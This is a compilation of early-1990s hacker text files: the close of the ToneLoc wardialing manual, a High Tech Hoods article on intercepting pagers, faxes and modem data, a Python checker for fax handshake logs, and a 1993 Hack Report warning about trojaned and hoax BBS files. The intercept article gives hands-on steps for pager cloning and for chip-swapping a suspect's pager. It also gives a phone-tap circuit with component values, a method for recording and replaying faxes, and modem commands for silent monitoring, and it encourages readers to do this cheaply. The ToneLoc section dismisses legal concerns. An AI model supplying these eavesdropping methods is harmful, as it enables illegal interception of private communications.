illegal if you only call once. We’ve heard that scanning with intent to
hack is illegal, as if such a thing could be proven. (Some people
suggest not using the same phone line for hacking and scanning).
Remember, the most important thing is not whether it is illegal, but
whether you piss someone off or attract attention.

Here’s what the staff at 2600 magazine have to say about wardialing:

“In some places, scanning has been made illegal. It would be hard,
though, for someone to file a complaint against you for scanning since
the whole purpose is to call every number once and only once. It’s not
likely to be thought of as harassment by anyone who gets a single phone
call from a scanning computer. Some central offices have been known to
react strangely when people start scanning. Sometimes you’re unable to
get a dialtone for hours after you start scanning. But there is no
uniform policy. The best thing to do is to first find out if you’ve got
some crazy law saying you can’t do it. If, as is likely, there is no
such law, the only way to find out what happens is to give it a try.”
[2600, Spring 1990, Page 27.]

Problems? (Or; Why doesn’t Toneloc work with my modem?)
---------

ToneLoc’s tone scanning mode may not work for everyone’s modem.
ToneLoc looks for tones by dialing strings like this: “ATDT 555-1234 W;”.
This tells the modem to dial the number 555-1234, wait for dialtone, and
then return to the command line. ToneLoc then waits for a result code.
If it gets Ringing, Voice, Busy, etc. it moves on to the next number.
If it gets nothing, the modem never heard a dialtone, so ToneLoc hangs
up and moves on – this is a timeout. If it gets “OK” as a result code
the modem has heard a tone (W waits for a dialtone) and returned to
the command line (semicolon (;) returns to the command line).

ToneLoc won’t work if your modem isn’t discriminative. Some cheap
modems “detect” dial tones just fine, but they also “detect” everything
else – rings, busys, even silence. Other modems won’t wait long enough,
and will move from W to ; very quickly. If you have a problem that
doesn’t stem from either of these, let us know and we’ll see what we can
do to help.

Dual Scanning:
--------------

For a long time now we have been asked if it was possible to scan for
tones and carriers at the same time. At last, we have found a way.

The USR Courier 2400 was a great modem in its time, and it is the best
modem we have found for scanning. The Courier 2400 has several unique
features. First, it detects carriers as tones. This means a tone scan
should pick up both carriers and tones, and a good number of falses.
This works fine, but it’s a pain to manually sort out the carriers from
the many false responses you inevitably get when scanning for tones.

Recently, however, we discovered that the Courier 2400 will give a “NO
CARRIER” in response to a dialtone during a carrier scan. If you set your
ToneResponse to NO CARRIER in your config file, and scan for carriers,
you will pick up all the carriers and tones separately, on one pass!

There’s a good chance other modems may behave similarly. Try it with
your modem and see. If you find one that works well, tell us about it
and we’ll include a note in the next version of Toneloc. If not, you
should be able to pick up a used Courier 2400 for cheap.

Credits:
——–

We hope you find this program useful. Give it to anyone and
everyone who deserves to have it. If you think it is very cool and
useful, try to contact us somehow. If you think it is a piece of shit
and the directions totally misguided, try to contact us anyway. Our
handles are Minor Threat and Mucho Maas. Minor Threat can be reached on
CelerityNet, our internet address , or IRC.
Mucho Maas can be reached at the internet address as well.

ToneLoc is written in C and assembly. Assembled by Turbo
Assembler, and compiled by Borland C++ 3.1. Window routines are from
CXL v5.2. The built-in SERIAL routines are based on code from an
excellent book: “Serial Communications in C and C++” by Mark Goodwin.

Minor Threat Sez:

Thanks to Alexis Machine and Marko Ramius for getting me started
phreaking. Thanks to our beta testers, and thanks Alexander Bell for
inventing the telephone. I know he had us in mind.

Mucho Maas Sez:

Thanks to Minor Threat for helping me work on ToneLoc. It should be
noted that the lion’s share of the programming was done by him, and that
his code is a hell of a lot cleaner than mine. Still, somebody had to
get Threat off his ass, and give him features to re-write. Credit for
the PBX hacking technique described here goes to an old text file by Steve
Dahl.

——————————————————————————
One last quote: from a newspaper editorial in the 1870’s

‘… carrying human voice over copper wires is impossible, and even if
it was possible, the thing would have no practical use.’

HA!

Pager, Fax, and Data Intercept Techniques, by The High Tech Hoods

The High Tech Hoods Presents...

               *&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*
               *                                           *
               * PAGER, FAX, AND DATA INTERCEPT TECHNIQUES *
               *                                           *
               *&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*&*

One can only imagine the internal trauma of being a paging company owner. It
would be sort of like owning a company that made little glass vials: hell,
business has just suddenly shot through the roof over the last few years,
making enormous profits for everyone lucky enough to be in the business of
manufacturing little glass vials, but sometimes, late at night, the owners
must wonder exactly why people are buying millions of little glass vials... So
it goes with pagers; the popularity of the common pager has exploded
concurrently with the drug trade. Pagers are so popular that in America 7.2%
of the entire population carries a pager. In the good old days, wearing a pager
meant you were a doctor or maybe a car thief, but certainly nothing more
disreputable than that. Today doctors, and let's face it, even car thieves,
like to hide their pagers under jackets or tend towards those new little
pagers that masquerade as ballpoint pens so people don't assume they're drug
dealers. At this writing, one state (Virginia) actually has a law prohibiting
pager use on school grounds and several other states have tried to pass bills
(unsuccessfully) demanding licensing of pagerized individuals.

Not to say that pager companies don't have some kind of conscience; they do.
In fact, they have formed a group known as TELOCATOR, the Mobile
Communications Industry Association. Telocator promotes paging/police
cooperation and attempts to keep its individual members informed on the latest
laws and procedures as they apply to pagers. However, to be frank, their
primary success seems to be cute little stickers that say "MOBILEized" for the
war on drugs for pager companies to stick on their doors, along with nice
little laser-written posters that remind prospective pager renters that the
"use of a pager in a commission of a felony is prohibited by federal law and
carries a penalty of up to four years imprisonment and/or a fine of up to
$30,000 for each offense."

  One can only wonder exactly how effective these efforts are in shaping the
morals of the pager industry, especially since the subscriber base is expected
to continue growing and is estimated to reach 21 million users by the
mid-1990's. Pagers operate in the clear on radio frequencies that can be
received with any standard receiver or a scanner. The information transmitted
on pagers can be of interest to anyone from law enforcement to business
competitor groups. There are several interesting ways of extracting said
information.

TYPES OF PAGERS
Although numeric display pagers constitute more than half of the pagers in use
today other types are also in use. Here's a list ordered by popularity:

NUMERIC DISPLAY: This service lets one receive numbers sent from any
touch-tone telephone. The pager beeps and shows telephone numbers,
previously agreed-upon codes, parts numbers, stock prices, purchase orders,
and so on. Limited information may be sent along in the form of numbers that
stand for initials, or simple codes.

TONE: The tone pager emits a beep telling the user to call back a
predetermined location such as an office, home, voice mailbox, or telephone
answering machine.

TONE AND VOICE: This paging service gives an audible tone
followed by the message in the caller's own voice. There is no operator, and
no need for the user to call in. The pager delivers the complete message.

ALPHANUMERIC DISPLAY: This latest development is actually a miniature
message center that beeps and displays messages in words and numbers. Messages
are sent through an input device or dispatched by a live operator.

PRIVACY LAWS AND PAGERS
For each type of pager, different legal requirements must be met for
intercepts. On the federal level, the easiest pager to deal with is the simple
tone-only device. The U.S. Justice Department had long held that interception
of a tone-only pager was not a search, since there is no expectation of
privacy in a device that only beeps or vibrates. Therefore, the Department has
maintained, interceptions raise no Fourth Amendment issues and require neither
a warrant nor a court order. This policy was certified by Congress when it
passed the Electronic Communications Privacy Act of 1986 (ECPA), which
excludes tone-only pagers from its provisions. Although the information
conveyed by intercepting a tone-only pager is limited, such intercepts can be
helpful in documenting patterns of behavior by suspected criminals. Since they
are the cheapest and easiest to use of all pagers, tone-only units may be most
commonly encountered in connection with drug activity, at least among lower
echelon criminals. Federal and state laws treat privacy interests in display
and tone-and-voice paging communications. Under ECPA, for example, the police
generally cannot intercept a tone and voice or a display pager without first
securing an appropriate court order. This restriction stems from Congress'
conclusion that subscribers using such pagers have a reasonable expectation of
privacy in the paging communications they send and receive. A similar
conclusion is also reflected in state privacy statutes, which often impose
stricter requirements on carriers and law enforcement officials than does the
ECPA. As requirements for legal protections increase, so do the rewards for
intercepting display pagers. A numeric display pager displays a 10- or
12-digit number, usually the phone number of a person who desires a return
call. More sophisticated drug dealers, however, use the digits as code, with,
for example, a "1" at the end of a phone number meaning "the cocaine is not
in."

  Obviously, police and others intercepting such messages with monitoring
devices or cloned pagers can harvest considerable worthwhile information.
The recent increase in the use of alphanumeric paging is beneficial to law
enforcement due to the added bonus of text messages. Theoretically, exact
details of drug transactions could be made available to law enforcement if the
deal was conducted via alpha paging and an intercept was in progress. There
are several ways in which paging carriers aid law enforcement in preventing
illegal use of pagers for drug transactions, including leasing pagers which
are cloned to police, assisting in intercepts of paging communications and
providing the police with information about paging subscribers. Federal and
state privacy statutes, however, generally require law enforcement agencies to
secure appropriate authorization before enlisting the aid of paging
carriers. Specifically, most privacy laws prevent the police from using a
cloned pager or intercepting a paging communication unless they have first
obtained a court order, a special emergency request or the subscriber's
consent. Similarly, law enforcement agencies may not gain access to
information about paging subscribers (such as transactional records) unless
they secure either a subpoena, a warrant, a court order, or the consent of the
customer.

INTERCEPTIONS: AN OVERVIEW
Successful pager interception is dependent
upon several factors:

1. Frequency of the paging service. Law
   enforcement agencies or detectives are advised
   to simply call local paging carriers and ask
   them for their frequencies. This is public
   information and usually will be given out
   without any problem. Books are also
   available on this subject from CRB RESEARCH.

2. Paging number. Some intercept techniques
   require the actual phone number that
   activates a particular pager.

3. Cap code. A cap code is a seven or eight digit
   number that is the actual EIN, or Electronic
   Serial Number of the pager. This digital cap
   code is what the pager looks for in the
   stream of paging messages before it locks
   onto a message and notifies its wearer.

4. Some interception methods require the
   paging format. There are a number of
   proprietary formats engineered by pager
   manufacturers.

  Most paging systems operate in the FM band normally from 35 MHz to new
super-high microwave pagers in the 931-932 MHz area. These signals can be
received on any receiver but they will come in as frequency shift data
signals, nothing that is intelligible to the normally equipped listener. Most
paging systems have a local coverage area determined by the number and
placement of their transmitters; the average area is probably 40-60 miles in
size, although many companies are now expanding their coverage by adding
additional transmitters or making deals with other companies to give statewide
coverage. A new paging system actually gives nationwide coverage. The system
is known as Wide Area Paging and is typified by CUE Paging Corporation. The
user rents a "Cue Pager" which is actually not a fixed receiver but rather a
scanner that scans the FM commercial radio band. Cue (and other companies)
rent space on one or more commercial FM stations in most cities in the United
States. In fact, Cue boasts of over 200 FM stations in their nationwide
network. The paging signal is carried on a sub-carrier, or SCA, portion of the
broadcast signal that is inaudible to standard receivers. No matter where the
subscriber finds himself, his unit will scan until it finds the paging
sub-carrier signal and then lock on to that signal, waiting for its own cap
code to appear. To page a subscriber, the caller dials an 800 number and then
plugs in the specific pager identity code. This data is flashed by an uplink
by a satellite where it is transmitted across the country to various downlink
stations and then land lined or microwaved to FM radio transmitting towers.
In a Cue-type system, it is not necessary to know where the subscriber is;
simply the fact that he is in the United States gives a very high probability
of reaching him on his pager. The pager itself is no larger than a standard
Motorola-type paging unit. These wide area systems normally offer some sort of
echo back or voice mail system to let subscribers retrieve messages from an
800 number in case they happen to be between SCA stations when a message comes
in.

There are a couple of ways of intercepting pager messages. One of the niftiest
is through the use of a clone. A cloned pager is simply a pager which operates
on the same frequency and has the same cap code as the target's pager. In
short, the paging system has no way of knowing how many receivers are actually
listening at any given time, so any message that is transmitted will be
received simultaneously by all identical pagers. Traditionally this has been
the favorite method of law enforcement to intercept a suspect's messages;
paging companies will cooperate with departments who have authorization by
issuing them details on the owner of any pager or by physically manufacturing
a cloned pager and giving it to a detective. One narc I know uses the vaguely
dubious trick of "borrowing" a subject's pager during a body search, popping
out the EIN chip and replacing it with a non-programmed chip. When the pager
is returned to its owner it will, of course, no longer work. Disgruntled owner
takes pager back to company and complains. With any luck the company will
program a new pager to the same cap code on the spot and give it back to the
suspect. The cop simply pops the EIN chip into his own pager and now owns a
non-registered clone that will duplicate the perp's messages... A TRICK

  The second paging intercept option is to purchase one of several software
packages that work in conjunction with a scanner or a receiver and an IBM or a
Mac PC. These software packages "listen" to the scanner which is set up to
listen to a certain paging frequency. In this type of operation, the potential
interceptor only needs to know either the cap code or the call
number, nothing else. Assuming one has the phone number to activate the target
pager, one simply turns on the receiver, initializes the software and then
dials the pager sending a unique code (for some reason 6666 seems to be in
vogue with most law enforcement agencies), and then watches a computer monitor
to see when the code is broadcast. The program will immediately display the
cap code of the pager and, if it is an alphanumeric pager, the text message.
Once this has transpired, the program will set up an automatic file in the
computer to grab any and all further messages to that pager, storing them as
to time, date, and phone number or text message to be called. Most systems
will take any of the paging formats including the POCSAG format. Case files
can be printed immediately or printed when reviewed or stored on floppy disks
and reviewed at any time. Most of these systems will monitor from 1-32,000
pagers at any given time and set up a file for each individual pager. These
systems began as proprietary systems to be used by paging companies to monitor
hacking attempts, traffic patterns, and system problems but have spread to law
enforcement and now civilian intercept markets. Do these systems work? Yes,
I've tested the INTERCEPTOR-LE system and it pretty much does what it says
it's going to do. The system grabs and displays incoming messages
simultaneously or in many cases faster than the pager receives them and works
with all existing paging formats as well as has the capability to use new
formats as they are introduced. The LE system sells in the $4,000 range at the
time of this writing but, folks, let's face it, it's just a little software
package and lower-priced clones are going to appear on the market if they
haven't by this writing. LE is available from SHERWOOD COMMUNICATIONS. A
second paging intercept program is available from TGA Technologies in Dunwoody,
Georgia. Or you can get it from The New York Hack Exchange BBS.

What to do if you think your pages are being intercepted by some nameless
force? One gentleman I know (damn but I do know a lot of interesting people,
don't I?) got a "666" page on his pager in the middle of the night. He had
reason to suspect he was the target of a non-warranted police surveillance as
a close friend of his had just been popped on a weapons charge (later
dropped). My friend spent the next two days calling himself and entering 30 or
so "interesting" return numbers including CIA, NSA and FBI offices around the
country, plus international suppliers of anything interesting, phone numbers of
various embassies and even a White House "inside" number he happened to have on
hand. It may not be a cure all, but the satisfaction of knowing he was driving
several detectives crazy did provide a certain amount of satisfaction.

FAX INTERCEPTION
Alexander Graham Bell must be turning over in his grave at the spread of the
ubiquitous fax machine. Fax machines are rapidly replacing telephones as the
primary method of communication for many businesses and some individuals. I
personally know of at least two people who have impulsively ripped out their
telephones and replaced them with a fax machine, the implication being, of
course, that my time is too valuable to waste talking on the phone. Many
people who should know better think that faxes are a safer method of data
exchange than is the telephone because no words are transmitted, simply data.
As one might suspect, this data can be intercepted and logically regurgitated
to "bug" fax machines. There have been a couple of problems associated with
fax tapping that have just recently been solved; faxes trade data by means of
frequency- or phase-shift keying at speeds of 300 to 9600 baud. This type of
data transmission does not lend itself to recording and playback on most
audio tape recorders, as the speed is too high and the frequencies are too
close together. Any distortion renders the transmission unintelligible. Faxes
fall into several groups depending on what type of transmission parameters they
employ. The most common one at this time is called Group III. The particular
protocols for Groups I, II, III and IV, are set by something called CCITT and
are available in a $25.00 booklet.

Faxes trade setup information at the beginning of each call in something
known as the handshake period. During the handshake the sending fax will set
itself to the highest possible group protocol that the receiving fax will
accept before it begins transmitting data. The sending fax requires acceptance
and confirmation of this handshake before it will begin the actual
transmission. Some faxes offer limited security by reading the phone number of
the receiving fax and comparing it to an internal list before sending the data,
but this should not concern anyone who is tapping into the line because if they
use a high impedance phone tap (just a simple .01 mfd capacitor in series with
10k ohm resistor and perhaps a NE-2 neon lamp across the line between the two
components), the sending fax will not notice the "invisible" third party on
the phone line. Let's examine the handshake protocol of a typical fax machine.
What happens when one presses "send" on a fax machine? The answering fax
machine transmits a 2,100Hz tone for three seconds, and then begins a
negotiating process at 300bps including a single high-pitched tone, followed
by a lower, warbling tone. The second tone is the 300-bps receiver
capabilities packet. When the warbling ends, there is a brief pause, and if the
calling fax hasn't responded, the process is repeated. The first step is to
send a digital identification signal (DIS) that tells the answering machine
what it can do including: What is the maximum transmission speed possible?
Does the sending unit support modified read compression? Does it include
error correction? The sending fax transmits a digital command signal (DCS)
that tells the called unit which of the operating parameters described in the
DIS will be used. This signal turns on these features in the receiving unit.

The sending fax transmits a test signal to help the receiving unit lock onto
the proper signals. The receiving fax transmits a confirmation-to-receive
(CFR) signal to tell the sending unit it is ready to accept the first page.
The first page of the fax message is sent from the originating device. When the
end of the page is reached, the sending unit transmits an end-of-page (EOP)
signal and waits for a message confirmation (MCF) from the receiving unit.
This process continues until the final page is sent and the calling fax
transmits a disconnect (DCN) signal to sever the connection, freeing both
telephones. Note that the initial handshaking that establishes the
capabilities of each unit in the connection is conducted only once, at the
beginning of the link. Once the sending fax starts transmitting pages, there
is no need for this handshake again. Commercial fax interception devices are
made by a number of companies including HDS and STG, aimed at law enforcement
but, in some cases, sold to anyone with the bucks. Commercial facsimile taps
are based either on an IBM PC equipped with a fax modem which intercepts and
receives the protocol signals and the fax message, writing it directly to disk
and then reprinting it out on the screen or on a printer or by employing a
special tape recorder to save messages for later playback through a modified
fax machine. These devices do work and have been used in courts on numerous
occasions. They also average about $28,000 each. If money's no object, hey, I
say give 'em a call. In reality there's very little difference in tapping a
data transmission than there is in tapping a voice transmission. Here's how to
do it for about $27,000 less:

Intercept the data stream by use of a good dropout recorder or high impedance
capacitor circuit as described above. Record the entire transmission on a
digital audio tape recorder. DAT's are now commercially available for about
$800 but this will drop soon and may have dropped by the time you read this.
DAT's use a high sample rate to record the audio in the form of boolean
digits. There is no distortion, noise or error introduced in playback or
recording. What you hear is what you get. Therefore, DAT's are the ideal and
perhaps really the only method of recording fax transmissions.

Once the transmission is on tape, there are two choices: either feed it into a
fax modem and into a computer where it can be stored and manipulated, or feed
it directly into a fax machine. In either case the information should come
down a phone line. The simplest way to do this, if one has access to two phone
lines, is to unscrew the mouthpiece and clip a jumper cable from the output of
the DAT directly into the telephone line, dial up the other phone line and run
it into the computer or fax machine. However, a very nice alternative is to
employ your own central office in the form of a VIKING Phone Line Simulator.
For about $100 this little device provides a carrier that makes any phone
think it's hooked up to central office and another telephone. Signals, voice
and data can be fed into the simulator and will come out at line level at the
output.

If the resulting signal is to be fed into a computer, the carrier on the modem
should be turned off so it will not respond with a carrier of its own when
receiving the target's communications, resulting in interference. If a Hayes
equivalent modem is used, the signal sequence to put it into the monitor mode
so it will still receive data without a carrier is as follows:

FOR ORIGINATE: AT C0 S10=255D
FOR ANSWER: AT C0 S10=255A

This turns off the carrier and sets the modem to ignore the carrier loss.

The output of the DAT can be fed into a fax machine, and with a little bit of
practice one can use the pause button in order to time the handshake sequence,
setting up the fax machine to receive the intercepted transmission just as
if it were the receiving end fax.

   As long as the machines sync up with regard to baud rate and protocol, it
will reproduce the fax communication.

  This procedure will also work for data communications between two
computers. Instead of feeding the result into a fax, simply feed it into your
modem. In fact, modem transmission, which is frequency shift keying and less
subject to distortion than phase shift keying, can often be reproduced by a
high quality reel-to-reel tape recorder.

 Or you can get the 'DATA TAP' program that will soon be available throughout
the computer underground. This program allows one to TAP into various lines
with a stand-alone unit or use of a laptop. The program is expected to be
released in Jan. of 94. It's written by The Raven and IBMMAN of The High
Tech Hoods. For any other info, contact them.
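
The Group III handshake order described in the FAX INTERCEPTION section above (2,100 Hz tone, DIS, DCS, test signal, CFR, then page / EOP / MCF until DCN), written as a state machine that checks a logged fax session and counts the pages the receiver actually confirmed. This is an added example, not part of the original article; the trace format, the state names and the TONE_2100 and TRAINING labels are assumptions, and DIS is taken as sent by the answering fax, as in T.30.

```python
# Sides: ANS = answering (receiving) fax, CALL = calling (sending) fax.
# Allowed transitions: state -> {(side, signal): next state}.
# Simplified to the signals the article names; real T.30 has more
# (for example a separate between-pages signal and retrain paths).
FLOW = {
    "START":     {("ANS", "TONE_2100"): "ANSWERED"},
    "ANSWERED":  {("ANS", "DIS"): "OFFERED"},
    "OFFERED":   {("ANS", "DIS"): "OFFERED",       # repeated if no reply yet
                  ("CALL", "DCS"): "SELECTED"},
    "SELECTED":  {("CALL", "TRAINING"): "TRAINED"},  # the "test signal"
    "TRAINED":   {("ANS", "CFR"): "READY"},
    "READY":     {("CALL", "PAGE"): "PAGE_SENT"},
    "PAGE_SENT": {("CALL", "EOP"): "AWAIT_MCF"},
    "AWAIT_MCF": {("ANS", "MCF"): "CONFIRMED"},
    "CONFIRMED": {("CALL", "PAGE"): "PAGE_SENT",   # capabilities are not
                  ("CALL", "DCN"): "DONE"},        # renegotiated per page
}


def check_session(trace):
    """Walk a list of (side, signal) events through FLOW.

    Returns a dict with:
      complete        - True only if the session ran through to DCN
      pages_confirmed - number of MCFs seen, i.e. pages the receiver
                        acknowledged (a page sent without MCF is not
                        counted as delivered)
      problem         - None, or a description of the first deviation
    """
    state, pages = "START", 0
    for step, (side, signal) in enumerate(trace, start=1):
        nxt = FLOW.get(state, {}).get((side, signal))
        if nxt is None:
            return {"complete": False, "pages_confirmed": pages,
                    "problem": f"step {step}: {side} {signal} "
                               f"not expected in state {state}"}
        if signal == "MCF":
            pages += 1
        state = nxt
    if state != "DONE":
        return {"complete": False, "pages_confirmed": pages,
                "problem": f"log ends in state {state} without DCN"}
    return {"complete": True, "pages_confirmed": pages, "problem": None}


# Constructed traces (not captured from any real device).
GOOD_TWO_PAGES = [
    ("ANS", "TONE_2100"), ("ANS", "DIS"), ("ANS", "DIS"),
    ("CALL", "DCS"), ("CALL", "TRAINING"), ("ANS", "CFR"),
    ("CALL", "PAGE"), ("CALL", "EOP"), ("ANS", "MCF"),
    ("CALL", "PAGE"), ("CALL", "EOP"), ("ANS", "MCF"),
    ("CALL", "DCN"),
]
# Line dropped after the second page went out: only page 1 was confirmed.
DROPPED_AFTER_PAGE_2 = GOOD_TWO_PAGES[:11]
# Page data appears before the receiver confirmed it was ready.
PAGE_BEFORE_CFR = [
    ("ANS", "TONE_2100"), ("ANS", "DIS"), ("CALL", "DCS"),
    ("CALL", "TRAINING"), ("CALL", "PAGE"),
]

if __name__ == "__main__":
    for name, trace in [("good", GOOD_TWO_PAGES),
                        ("dropped", DROPPED_AFTER_PAGE_2),
                        ("early page", PAGE_BEFORE_CFR)]:
        print(name, check_session(trace))
```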

The Hack Report Volume 2, Number 9 (September 12, 1993)

  =========================================================================
                                    ||
  From the files of The Hack Squad: ||  by Lee Jackson, Moderator, FidoNet
                                    ||    Int'l Echos SHAREWRE & WARNINGS
          The Hack Report           ||  Volume 2, Number 9
        for September, 1993         ||  Report Date: September 12, 1993
                                    ||
  =========================================================================

  Welcome to the ninth 1993 issue of The Hack Report.  This is a series
  of reports that aim to help all users of files found on BBSs avoid
  fraudulent programs, and is presented as a free public service by the
  FidoNet International Shareware and Warnings Echos and the author of the
  report, Lee Jackson (FidoNet 1:124/4007).

  This has not been a very good month here at Hack Central Station:  not
  only was the report delayed by a week due to a back injury, but the
  August issue was the subject of a hack.  It isn't the first time, and it
  won't be the last.  Also, a file reported as a hoax last month has been
  reclassified as a Trojan, and many new pirated files surface.  Thanks to
  everyone who has helped put this report together, and to those that have
  sent in comments and suggestions.

  NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
  your BBS, subject to these conditions:

             1) the latest version is used,
             2) it is posted in its entirety, and
             3) it is not altered in any way.

  NOTE TO OTHER READERS: The Hack Report (file version) may be freely
  uploaded to any BBS, subject to the above conditions, and only if you do
  not change the filename.  You may convert the archive type as you wish,
  but please leave the filename in its original HACK????.* format.  The
  Hack Report may also be cross-posted in other networks (with the
  permission of the other network) as long as it meets the above conditions
  and you give appropriate credit to the FidoNet International Shareware
  and Warnings Echos (and the author <g>).

  The idea is to make this information available freely.  However, please
  don't cut out the disclaimers and other information if you use it, or
  confuse the issue by spreading the file under different names.  Thanks!

  DISCLAIMER: The listings of Official Versions are not a guarantee of the
  files' safety or fitness for use.  Someone out there might just be
  sick-minded enough to upload a Trojan with an "official" file name, so
  >scan everything you download<!!!  The author of this report will not be
  responsible for any damage to any system caused by the programs listed as
  Official Versions, or by anything using the name of an Official Version.

  On this same note, programs and files listed in this report should not be
  automatically considered dangerous.  It is simply impossible for the
  author of this report to receive and test copies of every listed file, so
  many of the reports listed herein are based on information sent to the
  author by individuals in the BBS community.  For this reason, neither the
  author of this report nor anyone officially associated with it shall be
  held liable for any losses and/or damages resulting from a listing in
  this report.

  Finally, the releases listed as the latest Official Versions may not be
  entirely accurate.  However, they do reflect the latest version known to
  the author of The Hack Report at the time of writing.  That's the nature
  of the beast we call shareware:  authors have every right (and in this
  writer's opinion, are well advised) to release a new version without
  advance notice of any kind.  If you see a version newer than one listed
  here, please contact one of The HackWatchers or myself so that we can
  keep these listings up to date.

  *************************************************************************

                              Hacked Programs

  Here are the latest known versions of some programs known to have hacked
  copies floating around.  Archive names are listed when known, along with
  the person who reported the fraud (thanks from us all!).

   Program              Hack(s)                    Latest Official Version
   =======              =======                    =======================
   ARJ Archiver         ARJ250                     ARJ241A
      Reported By:  Tommy Vielkanowitz(1:151/2305)
                        ARJ239E
      Reported By:  The Hack Squad
                        ARJ239G
      Reported By:  The Hack Squad
                        ARJ240A
      Reported By:  Ryan Shaw (1:152/38)
                        ARJ300
      Reported By:  Mike Stowe (ITCNet, via HW Robert Hinshaw)

   Blue Wave Offline    BWAVE213                   BWAVE212
    Message Reader
      Reported By:  Don Becker (grendel@jaflrn.linet.org)

   BNU FOSSIL Driver    BNU202                     BNU170
      Reported By: Amauty Lambrecht (2:291/712)    (not counting betas)
                        BNU188B
      Reported By: David Nugent (3:632/348),
                      Author of BNU

   DMS Amiga Disk       DMS version 1.12           DMS version 1.11
    Masher
      Reported By: Ben Filips, via Jay Ruyle (1:377/31)

|  F-Prot Virus Scanner FP-205B                    FP-209D
      Reported By: HW Bill Lambdin

   LhA Amiga Archiver   LHA148E                    LHA138E (Shareware)
      Reported By: Michael Arends (1:343/54)       LHA v1.50r (Regist.)
                        LHA151
      Reported By: Lawrence Chen (1:134/3002)

   LHA Archiver (PC)    LHA214                     LHA213 (non-beta)*
      Reported by: Patrick Lee (RIME address RUNNINGB)
                        LHA214B
                        ICE214
                        LHA215
      Reported by: Kenjirou Okubo, LHA Support Rep.
         (Internet address: kenjirou@mathdent.im.uec.ac.jp)
                        LHA300
      Reported by: Mark Church (1:260/284)

   MakeNL               MKNL251                    MKNL250
      Reported by: Dan Guenthner (SAF-Net 44:900/200,
                   via HW Robert Hinshaw

   Math Master          MATHMSTR                   M-MST400
      Reported by: James Frazee (1:343/158)

   MusicPlay            MPLAY31                    MPLAY25B
      Reported By: Lee Madajczyk (1:280/5)

   PKLite               PKLTE201                   PKL115
      Reported By: Wen-Chung Wu (1:102/342)

   PKZip                PKZ301                     PKZ204G
      Reported By: Mark Dudley (1:3612/601)
                   Jon Grimes (1:104/332)

|  Shez                 SHEZ72A                    SHEZ92 (also
|                       SHEZ73                      SHEZ92P patch)
      Reported By: HW Bill Lambdin

   Telemate             TM40C                      TM412-1 through 4
      Reported By: Philip Dynes, RIME Telemate conference,
                   via HW Richard Steiner
                        TM401
      Reported By: HW Richard Steiner
                        TM410-1
      Reported By: Bat Lang (1:382/91)

   Telix                Telix v3.20                TLX321-1
                         (Prior to Dec. 1992)      TLX321-2
                        Telix v3.25                TLX321-3
      Reported By: Brian C. Blad (1:114/107)       TLX321-4
                   Peter Kirn (WildNet, via HW Ken Whiton)
                        Telix v4.00
                        Telix v4.15
      Reported By: Barry Bryan (1:370/70)
                        Telix v4.25
      Reported By: Daniel Zuck (2:247/30, via Chris
                    Lueders (2:241/5306.1))
                        MegaTelix
      Verified By: Jeff Woods, deltaComm, Inc.
                        Telix Pro
      Reported By: Jason Engebretson (1:114/36),
                   in the FidoNet TELIX echo

   TheDraw              TDRAW430                   TDRAW461
                        TDRAW5
      Reported by: Ian Douglas (5:7102/119)
                        TDRAW500
      Reported by: Ian Davis, Author
                        TDRAW550
      Reported by: Steve Klemetti (1:228/19)
                        TDRAW600
      Reported by: Hawley Warren (1:120/297)
                        THEDR60
      Reported by: Larry Owens (PDREVIEW echo, 1:280/17)
                        TDRAW601
      Reported by: Jesper Tragardh (2:200/109)
                        TDRAW800
      Reported by: James Carswell (1:153/775)

   Wolfenstein-3D       WOLF2-1                    #1WOLF14
                        WOLF2-2
      Reported By: Wen-Chung Wu (1:102/342)
                        WFSF2-IA
      Reported By: Jared Huber (1:203/762)

  * -   See the section "Clarifications and Thanks" for details on
        other valid version numbers for LHA.

  =========================================================================

                                Hoax Alert:

| Whoa - what happened here?  Wasn't there a report in the August 1993
| issue about OWS95B in this section of the report?  Yes, there was, but it
| has been moved.  After discussion with Aryeh Goretsky, SysOp of the
| McAfee VirusForum on CompuServe (76702,1714), this file has been
| reclassified.  Look in The Trojan Wars section for details and for Aryeh
| Goretsky's comments.

  HW Mikael Winterkvist reports that he received a program for study from
  Patrik Sjoberg, the author of Febbs.  The program Patrik found was called
  VIP and claimed to be a "new, easy to use archive-program" called "Visual
  Illusions Pack."

  Mikael and Patrik both studied the program and determined that it was
  merely an altered version of the LHA Archiver v1.13.  To make matters
  worse, the "author" asked for a registration fee.  Save your money.

  The Hack That Wouldn't Die has reared its ugly head again:  XTRATANK is
  still floating around out there, according to a sighting by Mike Ledoux
  (1:132/202).  This file was reported in detail in the 1992 Full Archive
  Edition of The Hack Report (HACK92FA), but it seems to be so unwilling to
  go away that it is mentioned again here.  For those of you new to The
  Hack Report, XTRATANK is a confirmed and tested hoax that does _not_
  double your hard drive space, regardless of what you might see when you
  do a DIR command.  If you have doubts, try the Fitzgerald test below.

  *** The Fitzgerald Test

  Here is the now-famous Fitzgerald Test, devised by Tim Fitzgerald of
  1:3800/18.0 and validated through testing performed by Bill Logan of The
  Pueblo Group (1:300/22).  Try this if you think you have managed to get
  XTRATANK to work on your system.  Follow these simple steps:

      1. Run CHKDSK and write down the free space it reports.
      2. Do a DIR command and write down what XTRATANK reports.
      3. Copy any text file to a new text file.
      4. Repeat steps 1 and 2, and compare.

  You will see that XTRATANK reports that twice as much disk space is taken
  up by the new text file.

  Michael Toth (1:115/439.7) has located another incident of the Amiga
  Emulator hoax, reported in the 1992 Full Archive Edition of The Hack
  Report as AMIGA.  This time, the file was under the filename IBM_AMGA,
  and contained the following internal files:

  Name          Length    Method    Size now  Mod Date    Time     CRC
  ============  ========  ========  ========  =========  ======== ========
  README.USA         393  Imploded       338  10 Apr 91  18:07:06 2CF72B62
  EMULATOR.EXE    273947  Imploded    157084  15 Sep 90  01:00:00 02A68881
  ============  ========  ========  ========  =========  ======== ========
  *total     2    274340  ZIP 1.10    158592  13 Oct 91  11:28:00

  The file claims to emulate Kickstart 1.2, version 33.192, on an IBM
  compatible.  Michael's tests show that this file doesn't do much, if
  anything - 15 minutes worth of waiting after running the program produced
  no results.

  Recently, an archive of Frisk's (a.k.a. Fridrik Skulason's) F-Prot Virus
  Scanner v2.07 has been distributed with a "registration form" from a
  company called JLT.  According to Frisk, this is not legitimate.  He says
  that JLT contacted him in the fall of 1992, asking if they could
  distribute F-Prot, collect registration fees, and forward 50% of the fees
